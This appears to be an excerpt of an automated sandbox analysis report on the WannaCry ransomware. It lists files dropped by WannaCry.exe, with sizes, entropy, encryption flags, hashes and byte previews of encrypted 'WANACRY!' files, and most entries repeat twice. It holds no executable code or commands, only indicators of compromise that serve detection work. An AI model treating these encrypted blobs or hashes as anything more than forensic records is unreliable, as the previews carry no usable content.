                                                                              Preview:WANACRY!......M..&|........eG?$P..t....TV..m`D.3....&H..YG/.[6..yT.D`...2.L9.3\....[...U.}...8.(...l..k.g..]....'GR.N^s.i.:.e....._...$>@..v|.{.hz..b......GWW.].....Q..`..2u.......P0.XO..2.e....RG....g..^.*...!......o.......Q.(T=..'..K.|.G.E...s.`<....b...............Booj..,.da...Y...4.S....[..>&....>&..-..cM+..>......;..._.9.\....8r.~q.A......i:;..f..K...%l.i.c...i.....$.....U..3.....z.K...>W...pUYxz.HZ....e..(.G..&.j..R/.1.m..;r.=.!...8.*..]G.......6.].......D.H._........@<.......__4.b..V.[2.....VO(=........<...?p6..|..h...!.@..B...,....ac.B.g....3...$d......C...w$j.@L.r.`y..K;.;..C.......E............X..../.@`R.u6.g..k.;....<...*.w`...Ki..g...(H...Z@...~....he[3..&.....C}e.._@6.Rg..._..O.Q<.$...pZ+`.t.....VfA......91.C.....O;...2Wr.P..U[.l....d9N.me...iDNovM.]......D5ZZ[%...p...J.6aj.....>crbb..8..`..7....p7.>!.o..*7..P..."......7"gw.<...\.P.+.Wa.....IJ...;..&..Y.NI.`..S.R.....tj.p.u.+.d ..n4.j;.>W.=.._...j..jyM?...J..i3..d...H9.y%..#.[..?.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.9998183182874225
                                                                              Encrypted:true
                                                                              SSDEEP:24576:7oynKeifKNOIRiyEWdTLTKfbvTO/4zzsT:7oB3S/R0mLTKbET
                                                                              MD5:AC3FBC0D9196F24A778C6C154C870703
                                                                              SHA1:BB2690AFBFF49EAE8EA7ABA97281135CBF0400DE
                                                                              SHA-256:5545F8371D0BE78D8B0AEA1CEB47045D89472E5CB473AFF47BBCA46BFE03371F
                                                                              SHA-512:D995A615A6BD33EF15D47B2D76379B03EC7C4FC50FAFA0F980FCDEFA835DB34AB43A365E7337B185BE1ABA8128C49F409D3477D76209CD1CD3C49F8B3E095529
                                                                              Malicious:true
                                                                              Preview:WANACRY!......M..&|........eG?$P..t....TV..m`D.3....&H..YG/.[6..yT.D`...2.L9.3\....[...U.}...8.(...l..k.g..]....'GR.N^s.i.:.e....._...$>@..v|.{.hz..b......GWW.].....Q..`..2u.......P0.XO..2.e....RG....g..^.*...!......o.......Q.(T=..'..K.|.G.E...s.`<....b...............Booj..,.da...Y...4.S....[..>&....>&..-..cM+..>......;..._.9.\....8r.~q.A......i:;..f..K...%l.i.c...i.....$.....U..3.....z.K...>W...pUYxz.HZ....e..(.G..&.j..R/.1.m..;r.=.!...8.*..]G.......6.].......D.H._........@<.......__4.b..V.[2.....VO(=........<...?p6..|..h...!.@..B...,....ac.B.g....3...$d......C...w$j.@L.r.`y..K;.;..C.......E............X..../.@`R.u6.g..k.;....<...*.w`...Ki..g...(H...Z@...~....he[3..&.....C}e.._@6.Rg..._..O.Q<.$...pZ+`.t.....VfA......91.C.....O;...2Wr.P..U[.l....d9N.me...iDNovM.]......D5ZZ[%...p...J.6aj.....>crbb..8..`..7....p7.>!.o..*7..P..."......7"gw.<...\.P.+.Wa.....IJ...;..&..Y.NI.`..S.R.....tj.p.u.+.d ..n4.j;.>W.=.._...j..jyM?...J..i3..d...H9.y%..#.[..?.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.272395105556548
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEte2M+vAEbBa3GzeBz4oZO0L4a4nh7YioxCdVrIaK/:bkEtjM+vFbBjEJZO0KhvLrIak
                                                                              MD5:BFE606CEF520F2FEEF019E93AC277521
                                                                              SHA1:CD7CF324D11D41298CC2621DFB48E16CD356EC15
                                                                              SHA-256:C6C8B1D9D7D088A1DDCB900F46989343487A0D9E7A12FB56423372653EDA3776
                                                                              SHA-512:53B774B30D0338B344A505072DDAA2551B3CCD04D09E57FEE9FEB63A320CDF857520F7A81D9E6899E3BD2F4621EC43CF795178CB026B8788B6665657722DB427
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....,."..zu$(......j]Jc..m-)t.w:.nF...~..W.Zp...P./.K...`x=.9x#...^.3?....8.[zi..h. ).ygq.S.....c.r....;1P...~......m...L....\..5P.W>...T/.h.. ..>...P....B...&.D..=....0.P......7o..%:0ALo..n.x?.Y4..^...zs..6*h7D...Q.2d...7i...)r..zq`.w.O.....u.............|...9.N..g.>..Sr...S.$@.'.'.eZ
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.272395105556548
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEte2M+vAEbBa3GzeBz4oZO0L4a4nh7YioxCdVrIaK/:bkEtjM+vFbBjEJZO0KhvLrIak
                                                                              MD5:BFE606CEF520F2FEEF019E93AC277521
                                                                              SHA1:CD7CF324D11D41298CC2621DFB48E16CD356EC15
                                                                              SHA-256:C6C8B1D9D7D088A1DDCB900F46989343487A0D9E7A12FB56423372653EDA3776
                                                                              SHA-512:53B774B30D0338B344A505072DDAA2551B3CCD04D09E57FEE9FEB63A320CDF857520F7A81D9E6899E3BD2F4621EC43CF795178CB026B8788B6665657722DB427
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....,."..zu$(......j]Jc..m-)t.w:.nF...~..W.Zp...P./.K...`x=.9x#...^.3?....8.[zi..h. ).ygq.S.....c.r....;1P...~......m...L....\..5P.W>...T/.h.. ..>...P....B...&.D..=....0.P......7o..%:0ALo..n.x?.Y4..^...zs..6*h7D...Q.2d...7i...)r..zq`.w.O.....u.............|...9.N..g.>..Sr...S.$@.'.'.eZ
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999826897199844
                                                                              Encrypted:true
                                                                              SSDEEP:24576:Qi3CTdl1RHCONAO1Fn/sNqjsCgeAbK4rtSOVKgXhpFo8F93ULT/:Qf1B3NFne6sCX8Z3F3U3
                                                                              MD5:B7B5B46A2089B2B7CC8D7E2EAA53161A
                                                                              SHA1:B869CBBE78E4EE5EFE05253D6759DA51A5B74F53
                                                                              SHA-256:78F712EC5E4645BA41B28B8CEBA3D063B6ED21607D6296FEEC4E90D1BD47B3DB
                                                                              SHA-512:72E0FE7E2AE83F449C8FBA6F2BE996E2A28147A6BAC7DA3DCB52F16C240365AA8890373EADFFC65C50DE7889EC39F40559C4AA2A38E144D8EE061E21277E1FDE
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........Q.zG..u.'...y..*J.t..0|x....;.!E!e.TR....!.}.....l.:.F.f.......E.h.4........;..E`.*.. ..zw.FA..&.m....<...#.c.0....d.yZ.<R...g..../|.H;Y.b..H...TD.B....1o.Cf..h..]....>.M....DI.aH.4..."x.)$......X...1.....*...t.......[.3.Sy....pEE=.U... R1.............4.....y...N.u...L8.}.Je8.?..65.........S....f/^..#%...H...f)}h..>`C.%..,...x1Y.B........ld..vf.../.`+,....C0.w...+.8........w.........8..aK..6.9........~.o.-..e.....r.Gps.zC....>._..'.Yhf..;..C.!d.V...g.g.......*H:1...B.[...4..!......u..E[g]......&X.,.z....j.A..qT..PIn.:.+lG9i.e.zVZm.{.WI..........{~..N.Q...k...L.j......Bu.v)...\..).D.kJ.TybZcj...'....../......X...Ik.x{.......U...u.!.V.....1n.......)3j..\..^..._..g.i.r."d....,.#m..Qj...K..Q.F..I...F.5.nz...$...W....x>......}2.Lw.>.$..7......wi..t8&.e....{... .w+GA......Z.2..#.jH..I.'J.;t5.>.t..Y.w.I%./+..c.^.6..."."..l.9-.T,.c?.~(.............?.X...g..#Y. ..j.:dSSb.?y.6..SL.E.B......r.f.M..ZlW...&D....r..F.7.U....|..... .=X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999826897199844
                                                                              Encrypted:true
                                                                              SSDEEP:24576:Qi3CTdl1RHCONAO1Fn/sNqjsCgeAbK4rtSOVKgXhpFo8F93ULT/:Qf1B3NFne6sCX8Z3F3U3
                                                                              MD5:B7B5B46A2089B2B7CC8D7E2EAA53161A
                                                                              SHA1:B869CBBE78E4EE5EFE05253D6759DA51A5B74F53
                                                                              SHA-256:78F712EC5E4645BA41B28B8CEBA3D063B6ED21607D6296FEEC4E90D1BD47B3DB
                                                                              SHA-512:72E0FE7E2AE83F449C8FBA6F2BE996E2A28147A6BAC7DA3DCB52F16C240365AA8890373EADFFC65C50DE7889EC39F40559C4AA2A38E144D8EE061E21277E1FDE
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........Q.zG..u.'...y..*J.t..0|x....;.!E!e.TR....!.}.....l.:.F.f.......E.h.4........;..E`.*.. ..zw.FA..&.m....<...#.c.0....d.yZ.<R...g..../|.H;Y.b..H...TD.B....1o.Cf..h..]....>.M....DI.aH.4..."x.)$......X...1.....*...t.......[.3.Sy....pEE=.U... R1.............4.....y...N.u...L8.}.Je8.?..65.........S....f/^..#%...H...f)}h..>`C.%..,...x1Y.B........ld..vf.../.`+,....C0.w...+.8........w.........8..aK..6.9........~.o.-..e.....r.Gps.zC....>._..'.Yhf..;..C.!d.V...g.g.......*H:1...B.[...4..!......u..E[g]......&X.,.z....j.A..qT..PIn.:.+lG9i.e.zVZm.{.WI..........{~..N.Q...k...L.j......Bu.v)...\..).D.kJ.TybZcj...'....../......X...Ik.x{.......U...u.!.V.....1n.......)3j..\..^..._..g.i.r."d....,.#m..Qj...K..Q.F..I...F.5.nz...$...W....x>......}2.Lw.>.$..7......wi..t8&.e....{... .w+GA......Z.2..#.jH..I.'J.;t5.>.t..Y.w.I%./+..c.^.6..."."..l.9-.T,.c?.~(.............?.X...g..#Y. ..j.:dSSb.?y.6..SL.E.B......r.f.M..ZlW...&D....r..F.7.U....|..... .=X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.212579593906951
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEr7a0exrYC+7ZvVa99glFjaL/hK3U7i7ujz9/gRblEPcfy98t:bkEHHnXM92l9fUz9/gRR4Yt
                                                                              MD5:2CFE9DBFB6592769835E1BA8BAAE996C
                                                                              SHA1:EC4E66F2FE40139D2983AFEA7A4AB706FB8B1532
                                                                              SHA-256:361BFFA5D9B1AEF8C86656B9D8CB7B5F52B72D57B191AFA7C6F81BE6C46B3116
                                                                              SHA-512:2A4F03F26BD1CC459483C10DED3FFFC0240DAC13CFB932264D5240C11C97641E6D263F9BCB45863386E20440086B8A31E846A59A9403C19B652B68849E5B1F87
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......i}#.J....{.s.+.i...._.`[j..7...sX.=..RlK.H.<.....l_:OH.Wg......Z.._QZ>..5x.?c.....#.i..l..(....K.-..+...>.B....=...=..2...4..2.C.%..0...;.-..1...R.*.\.Z.C.~..F..mS....VC..&Q..b..-..07.&....l.og~..F........^x....pb.B.h./..B$W..*%G.w..^L...'5K...............,A.X.t.L..%a..K3..+..$.J...']..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.212579593906951
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEr7a0exrYC+7ZvVa99glFjaL/hK3U7i7ujz9/gRblEPcfy98t:bkEHHnXM92l9fUz9/gRR4Yt
                                                                              MD5:2CFE9DBFB6592769835E1BA8BAAE996C
                                                                              SHA1:EC4E66F2FE40139D2983AFEA7A4AB706FB8B1532
                                                                              SHA-256:361BFFA5D9B1AEF8C86656B9D8CB7B5F52B72D57B191AFA7C6F81BE6C46B3116
                                                                              SHA-512:2A4F03F26BD1CC459483C10DED3FFFC0240DAC13CFB932264D5240C11C97641E6D263F9BCB45863386E20440086B8A31E846A59A9403C19B652B68849E5B1F87
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......i}#.J....{.s.+.i...._.`[j..7...sX.=..RlK.H.<.....l_:OH.Wg......Z.._QZ>..5x.?c.....#.i..l..(....K.-..+...>.B....=...=..2...4..2.C.%..0...;.-..1...R.*.\.Z.C.~..F..mS....VC..&Q..b..-..07.&....l.og~..F........^x....pb.B.h./..B$W..*%G.w..^L...'5K...............,A.X.t.L..%a..K3..+..$.J...']..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999845676288077
                                                                              Encrypted:true
                                                                              SSDEEP:24576:Ie0EjLSVJvQ/3DwHkg9nX8wuUvRQqIMd7LFiB2Lcqot:IPEjeq33gRduVjEFiB2LcqU
                                                                              MD5:6798B38D8EDDA0ECEED1799E5C15E8C3
                                                                              SHA1:0D14F56C6A21AFF84C1EDA65B1F6AF410F470B7F
                                                                              SHA-256:9239ACFA89850F08AFB0F1547D37D2B7D19DFFE98BE177F4464B1F0B09789866
                                                                              SHA-512:31DFB533617F730EF5ABC3939FE7E437A54261FAF9E1F6F9CC47B2218171F170000A968224F0896F35EA07FC61310534E83B074B0437E42837A21EFD198183CD
                                                                              Malicious:true
                                                                              Preview:WANACRY!....v..]Q.h.CJW.?Q_. .....d..........u0..\..-]..Bu. .L..:...m......&.(V.....7\jta..},E.....T.vJ...eG..e7.B...A...@.'.L.g?...Q.+{..../....%...0?rh.^"..|}.S.....m...1zM...^.9...v.."...{6..9,RvT.h.j.......sC3e.Z.M.@...x.+fu..........%....C..sve.............0.x.<.?XRO...l..P"..4......lr....a..c.ZO....=.1...j0.....w...(z)..8I.e...>`bs....}v..n.F.}......5..u.=.=..LR.9..m........3Yb:I...B|..+.|XB..A.i...1..V.e.n.,..q.....:....m....mQ%#<...c....?.x :h..G?.].....N..6..gCv.|...~c.D3.6.h...6.UK.....fGU0~e.R....&<c.j.pS'=?u.ne.fz......4./;.....x...q....^?8..#.j....v^...E..b..3>...N..{......(~>I...A..d..g;.E..".1r..1LUp2.............*...!.61j.0...m_...Tc.4..R".2.....d.`{..Hx.....vb......,....A.....@....9..o....Z...GB2..0.l....n...B.7*EC.W..!...fp.8.5.+..........7l<{R..W..$.'Gk.],..e.s. ,....a...It....S....\.;c....s.....O(...4.....(...i...A.....|u..H.R. .B.^..si$5.G.A_i....9.........LNA...J..y*..F;.H.h......X.g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999845676288077
                                                                              Encrypted:true
                                                                              SSDEEP:24576:Ie0EjLSVJvQ/3DwHkg9nX8wuUvRQqIMd7LFiB2Lcqot:IPEjeq33gRduVjEFiB2LcqU
                                                                              MD5:6798B38D8EDDA0ECEED1799E5C15E8C3
                                                                              SHA1:0D14F56C6A21AFF84C1EDA65B1F6AF410F470B7F
                                                                              SHA-256:9239ACFA89850F08AFB0F1547D37D2B7D19DFFE98BE177F4464B1F0B09789866
                                                                              SHA-512:31DFB533617F730EF5ABC3939FE7E437A54261FAF9E1F6F9CC47B2218171F170000A968224F0896F35EA07FC61310534E83B074B0437E42837A21EFD198183CD
                                                                              Malicious:true
                                                                              Preview:WANACRY!....v..]Q.h.CJW.?Q_. .....d..........u0..\..-]..Bu. .L..:...m......&.(V.....7\jta..},E.....T.vJ...eG..e7.B...A...@.'.L.g?...Q.+{..../....%...0?rh.^"..|}.S.....m...1zM...^.9...v.."...{6..9,RvT.h.j.......sC3e.Z.M.@...x.+fu..........%....C..sve.............0.x.<.?XRO...l..P"..4......lr....a..c.ZO....=.1...j0.....w...(z)..8I.e...>`bs....}v..n.F.}......5..u.=.=..LR.9..m........3Yb:I...B|..+.|XB..A.i...1..V.e.n.,..q.....:....m....mQ%#<...c....?.x :h..G?.].....N..6..gCv.|...~c.D3.6.h...6.UK.....fGU0~e.R....&<c.j.pS'=?u.ne.fz......4./;.....x...q....^?8..#.j....v^...E..b..3>...N..{......(~>I...A..d..g;.E..".1r..1LUp2.............*...!.61j.0...m_...Tc.4..R".2.....d.`{..Hx.....vb......,....A.....@....9..o....Z...GB2..0.l....n...B.7*EC.W..!...fp.8.5.+..........7l<{R..W..$.'Gk.],..e.s. ,....a...It....S....\.;c....s.....O(...4.....(...i...A.....|u..H.R. .B.^..si$5.G.A_i....9.........LNA...J..y*..F;.H.h......X.g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999842527639243
                                                                              Encrypted:true
                                                                              SSDEEP:24576:lEjdJM0QE1DQW1Q0BWGQwVdhDC10YTfkbEIx:iJ60bDNBbdARsDx
                                                                              MD5:9EC733C3B64FBBC9347086995D258988
                                                                              SHA1:4C35914E1AB662638CFB7347CF7B731A96949FA4
                                                                              SHA-256:991253AAD443247677624344316C4B6E6A9898589D102CB4CDFB904F94CAEACE
                                                                              SHA-512:ED7213448480C1C244BA0108D114643B6DF47D3A09C454ACC0B0F39180F7183D46B323B2C58933AEEB7E4AB78B2BD12ECA7AD6D9919ABE9A629AFADA1B30ADD4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......'..y.Zb4#.t..w...U.Z..?..!...<./..z..$-0m{..K..wO..-..$p........a.%.,fs]......q.~........'...........g..p[.4M..l....ml.y....p..fV!~m(....4)..k<....^.2........op..7.t..a.F.s-.> ../.(..F.S.....-Xk..d..V..r.db?.c...K.7.}?W...!..X.~vG..R1..9............._..h...Ir.....Q...Kc.:.J.?c..+.p..< =..Le./.T~_.K.2,.e.&)..d..I....?0...5...d.....J.)$....=.V.C|....F..\...T.....,..DP.&.s.d ~9l^n.d.o>....d.-..O...b....(J^.k......<st_..EDP....}^.`...W:./...R4.z...r.FK.T..8..=y}....u..*..W.....fh..L.5.....#.t.m.}....M.....f..X=.:9.V.V.<jn../...B..K!j R.. ~.$..W.v.w..J1.r..h#l.r.&..V#.1y...>..D...M.}cT.......(...... ....,...-7d..2.I.;..G.'~.%.p......)>...Z3.P..D`.0I.L..>...e(.>.......s...z.)7!kZ.iJQ.E..X..2.r+.N.._..[..Zm....D..u.J.L..N.....).,...H..b..j.'2@..{=...........n...!....C."D..?...4.Vj.1h.{>U.:f......9(<.=.D.{...5...I4...N.v......I..5d5.S...zx5|...0.Br>.".jV...c...8.1.._0g.6+.d...<....-...+XHg.JR.u.......!.e'.8..Sh.1.WRKk.pL...h.b.}........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.999842527639243
                                                                              Encrypted:true
                                                                              SSDEEP:24576:lEjdJM0QE1DQW1Q0BWGQwVdhDC10YTfkbEIx:iJ60bDNBbdARsDx
                                                                              MD5:9EC733C3B64FBBC9347086995D258988
                                                                              SHA1:4C35914E1AB662638CFB7347CF7B731A96949FA4
                                                                              SHA-256:991253AAD443247677624344316C4B6E6A9898589D102CB4CDFB904F94CAEACE
                                                                              SHA-512:ED7213448480C1C244BA0108D114643B6DF47D3A09C454ACC0B0F39180F7183D46B323B2C58933AEEB7E4AB78B2BD12ECA7AD6D9919ABE9A629AFADA1B30ADD4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......'..y.Zb4#.t..w...U.Z..?..!...<./..z..$-0m{..K..wO..-..$p........a.%.,fs]......q.~........'...........g..p[.4M..l....ml.y....p..fV!~m(....4)..k<....^.2........op..7.t..a.F.s-.> ../.(..F.S.....-Xk..d..V..r.db?.c...K.7.}?W...!..X.~vG..R1..9............._..h...Ir.....Q...Kc.:.J.?c..+.p..< =..Le./.T~_.K.2,.e.&)..d..I....?0...5...d.....J.)$....=.V.C|....F..\...T.....,..DP.&.s.d ~9l^n.d.o>....d.-..O...b....(J^.k......<st_..EDP....}^.`...W:./...R4.z...r.FK.T..8..=y}....u..*..W.....fh..L.5.....#.t.m.}....M.....f..X=.:9.V.V.<jn../...B..K!j R.. ~.$..W.v.w..J1.r..h#l.r.&..V#.1y...>..D...M.}cT.......(...... ....,...-7d..2.I.;..G.'~.%.p......)>...Z3.P..D`.0I.L..>...e(.>.......s...z.)7!kZ.iJQ.E..X..2.r+.N.._..[..Zm....D..u.J.L..N.....).,...H..b..j.'2@..{=...........n...!....C."D..?...4.Vj.1h.{>U.:f......9(<.=.D.{...5...I4...N.v......I..5d5.S...zx5|...0.Br>.".jV...c...8.1.._0g.6+.d...<....-...+XHg.JR.u.......!.e'.8..Sh.1.WRKk.pL...h.b.}........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.285215618377056
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE20pDiQygzcEins8cL7hinT4XnYWiZNdvO0lH1dXiWAyyydg:bkE3EUzZgcAcXN2idyS
                                                                              MD5:F552E67182508E10D9882AB560B239B9
                                                                              SHA1:21D12F71D2B55F4F1622C6090962B84986480CC2
                                                                              SHA-256:4C1E1C3CFF19B33A5961D6B9A1C403AECE27D805566BD309D89FD5AA5BBDB689
                                                                              SHA-512:F5A454EF5CDB1A952D13B648B1E459D8D5887954304751B2C82AA7AF08D4006ED476E65771DB6257C4BF69620671EBC53D9EF1A0780447F99183B3A52562FA82
                                                                              Malicious:false
                                                                              Preview:WANACRY!....v...S...Gfp...R..j.2sX.)ol....,Z.l....[M..).....G.v...o.}U..I....}........g:n.`f...Z.\.....q'%L....~a.f(...\.&Yq..{'v..........*..E.....#?.?.`ZY..=..Q.?|.O.O..p.=E.$H.x...7.w#........o...2.....}IH.p....+o..X..2Av."6.sk,....)....Yu|...^.................5vW.[5...K`.Z.E.Tq.&..B?.z0qd
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.285215618377056
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkE20pDiQygzcEins8cL7hinT4XnYWiZNdvO0lH1dXiWAyyydg:bkE3EUzZgcAcXN2idyS
                                                                              MD5:F552E67182508E10D9882AB560B239B9
                                                                              SHA1:21D12F71D2B55F4F1622C6090962B84986480CC2
                                                                              SHA-256:4C1E1C3CFF19B33A5961D6B9A1C403AECE27D805566BD309D89FD5AA5BBDB689
                                                                              SHA-512:F5A454EF5CDB1A952D13B648B1E459D8D5887954304751B2C82AA7AF08D4006ED476E65771DB6257C4BF69620671EBC53D9EF1A0780447F99183B3A52562FA82
                                                                              Malicious:false
                                                                              Preview:WANACRY!....v...S...Gfp...R..j.2sX.)ol....,Z.l....[M..).....G.v...o.}U..I....}........g:n.`f...Z.\.....q'%L....~a.f(...\.&Yq..{'v..........*..E.....#?.?.`ZY..=..Q.?|.O.O..p.=E.$H.x...7.w#........o...2.....}IH.p....+o..X..2Av."6.sk,....)....Yu|...^.................5vW.[5...K`.Z.E.Tq.&..B?.z0qd
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4194584
                                                                              Entropy (8bit):7.999958616708807
                                                                              Encrypted:true
                                                                              SSDEEP:98304:9uWLqnr0Xq23THtQWKUFN97b2N6hv8J+quGYoR:9TqmqAxQWrjXZU+L5oR
                                                                              MD5:4AF14406EE838F1D255E732A58AF8921
                                                                              SHA1:A2446218B8D308DD586A17E8D4F724B099588507
                                                                              SHA-256:1E418590A7F5EF2D25ABF99BC33F1199D8004C9B086B3D5A92672C1C25F73D9D
                                                                              SHA-512:A7957D78C4064962460014EE2343275F3EFAFAC0072945E9A0CD4C3D891236163312E619B400E318E541E02D622A0044E7175B188EA2F21CD245A899FAD0BCE3
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........../Z.-........d.C.I..K..}.b... .?..>/'k#.....t(..~...$.1.o...n1.m..ZV....O.....l......uz.r.1....s.....P'....W. k#..P.=U.3I.-..\ 98.y.3.Y.(.U.D.'..^.@.V.o..e....lPS....o.b..x..2GM.....'.......el.H.F.F..<`r[(-.....t.s..=..p..d-|..W.....I.6......@......WX...)....Ng.?...........w...y.t{..3..`.......y.....W.g9..&.x..>#.....w/..>L.(.c.......X.4.....c.pT.k.6...(..zT~...........1W..C"S..[.....~.eo%MZ|...w).Z.vXT.._..)8.q...hE.~..3..pqex...P\(...O.sp..,38:.K.aD.6.fJ.....o.:..S^..F..z.T5.....U...~..0......^.....9..h.p.&K.Bo.....-5.e....F.."*...4.vz.g1.....nU.w~*4..b-.;.0W..OH.c......L.J...{.;......[JL47gw.^n.....&....T.....+l..uO...o[.k..M.*.wf.....n..G.mP.v>.....eP..J.....N..t.....`.=O.Bg...*T.u.".*.O..n....QI.0P...(...cn.x...7.b... ..G....(............@..9...Gs/D...}.?r..4..oL...........6s.....!8:9r8...Z.`I). ..F....OJP......Hjzu..y...Z......c.h.l...t,o9i.....Q4Ect.....mc$....[.:[...,z.Kw....d$......o..B...N..y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4194584
                                                                              Entropy (8bit):7.999958616708807
                                                                              Encrypted:true
                                                                              SSDEEP:98304:9uWLqnr0Xq23THtQWKUFN97b2N6hv8J+quGYoR:9TqmqAxQWrjXZU+L5oR
                                                                              MD5:4AF14406EE838F1D255E732A58AF8921
                                                                              SHA1:A2446218B8D308DD586A17E8D4F724B099588507
                                                                              SHA-256:1E418590A7F5EF2D25ABF99BC33F1199D8004C9B086B3D5A92672C1C25F73D9D
                                                                              SHA-512:A7957D78C4064962460014EE2343275F3EFAFAC0072945E9A0CD4C3D891236163312E619B400E318E541E02D622A0044E7175B188EA2F21CD245A899FAD0BCE3
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........../Z.-........d.C.I..K..}.b... .?..>/'k#.....t(..~...$.1.o...n1.m..ZV....O.....l......uz.r.1....s.....P'....W. k#..P.=U.3I.-..\ 98.y.3.Y.(.U.D.'..^.@.V.o..e....lPS....o.b..x..2GM.....'.......el.H.F.F..<`r[(-.....t.s..=..p..d-|..W.....I.6......@......WX...)....Ng.?...........w...y.t{..3..`.......y.....W.g9..&.x..>#.....w/..>L.(.c.......X.4.....c.pT.k.6...(..zT~...........1W..C"S..[.....~.eo%MZ|...w).Z.vXT.._..)8.q...hE.~..3..pqex...P\(...O.sp..,38:.K.aD.6.fJ.....o.:..S^..F..z.T5.....U...~..0......^.....9..h.p.&K.Bo.....-5.e....F.."*...4.vz.g1.....nU.w~*4..b-.;.0W..OH.c......L.J...{.;......[JL47gw.^n.....&....T.....+l..uO...o[.k..M.*.wf.....n..G.mP.v>.....eP..J.....N..t.....`.=O.Bg...*T.u.".*.O..n....QI.0P...(...cn.x...7.b... ..G....(............@..9...Gs/D...}.?r..4..oL...........6s.....!8:9r8...Z.`I). ..F....OJP......Hjzu..y...Z......c.h.l...t,o9i.....Q4Ect.....mc$....[.:[...,z.Kw....d$......o..B...N..y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.189256533289892
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEfmIVHQ97qogG6160FPvgTxIY0t1Wi7BgUTOW4cmf0le62hT:bkEfmIGJqognRCIYU1FgoOPj
                                                                              MD5:A5083CF526191118AB99DDDAFD47C1F8
                                                                              SHA1:1C3725396A4AD9E8852BD7505FEFB3185147FD94
                                                                              SHA-256:2AC2C58D7A9D2CF8C329F984F28A997EB5A9F8CC43F36B1DCF5A363427202B09
                                                                              SHA-512:0BB321FCC9F553170298C0B1547CA63367FE9CDEEEF05476B70938331A8137628F27770D8BA6EAB70CD68074E942B82CF6282C6988E28086512CDE0DEB2E4220
                                                                              Malicious:false
                                                                              Preview:WANACRY!....?.M*.0.T..V\.*..5q.~.u.!.E.+ .....B..9..).b.......M.j.5}.3....k=W......=....Q.W...kq~....I...._./"...B..H..B.=V....6..T.......R..}.Ks1...\....k...1..`=z..........2.b....q......<.o...0.....m...u.,.?.G(.,f.)....K.......(.l....h...w.[vU4B....................O.........d..Y!.Y..0<O`..10
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.189256533289892
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEfmIVHQ97qogG6160FPvgTxIY0t1Wi7BgUTOW4cmf0le62hT:bkEfmIGJqognRCIYU1FgoOPj
                                                                              MD5:A5083CF526191118AB99DDDAFD47C1F8
                                                                              SHA1:1C3725396A4AD9E8852BD7505FEFB3185147FD94
                                                                              SHA-256:2AC2C58D7A9D2CF8C329F984F28A997EB5A9F8CC43F36B1DCF5A363427202B09
                                                                              SHA-512:0BB321FCC9F553170298C0B1547CA63367FE9CDEEEF05476B70938331A8137628F27770D8BA6EAB70CD68074E942B82CF6282C6988E28086512CDE0DEB2E4220
                                                                              Malicious:false
                                                                              Preview:WANACRY!....?.M*.0.T..V\.*..5q.~.u.!.E.+ .....B..9..).b.......M.j.5}.3....k=W......=....Q.W...kq~....I...._./"...B..H..B.=V....6..T.......R..}.Ks1...\....k...1..`=z..........2.b....q......<.o...0.....m...u.,.?.G(.,f.)....K.......(.l....h...w.[vU4B....................O.........d..Y!.Y..0<O`..10
